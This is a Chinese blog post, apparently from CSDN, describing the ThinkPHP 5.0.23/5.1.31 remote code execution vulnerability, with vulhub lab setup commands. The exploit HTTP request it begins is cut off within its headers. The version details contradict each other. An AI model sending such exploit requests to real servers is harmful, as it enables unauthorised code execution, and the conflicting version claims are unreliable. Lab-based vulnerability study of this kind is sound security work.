ThinkPHP 5.0.23/5.1.31 远程代码执行(含批量验证poc)

ThinkPHP 5.0.23和5.1.31因未正确处理控制器名,存在远程命令执行风险。在未启用强制路由时,攻击者可执行任意方法。漏洞可通过特定payload验证,官方已发布新版本5.0.23和5.1.31进行修复,建议受影响用户升级。
摘要由CSDN通过智能技术生成

漏洞描述

ThinkPHP是一款运用极广的PHP开发框架。其版本5.0.23和5.1.331中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。

影响版本

5.0.23/5.1.31

环境部署

该环境可以使用vulhub进行部署

cd vulhub/thinkphp
docker-compose up -d
docker-compose ps

image.png

漏洞利用

paylaod:

POST /index.php?s=captcha HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Conn
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值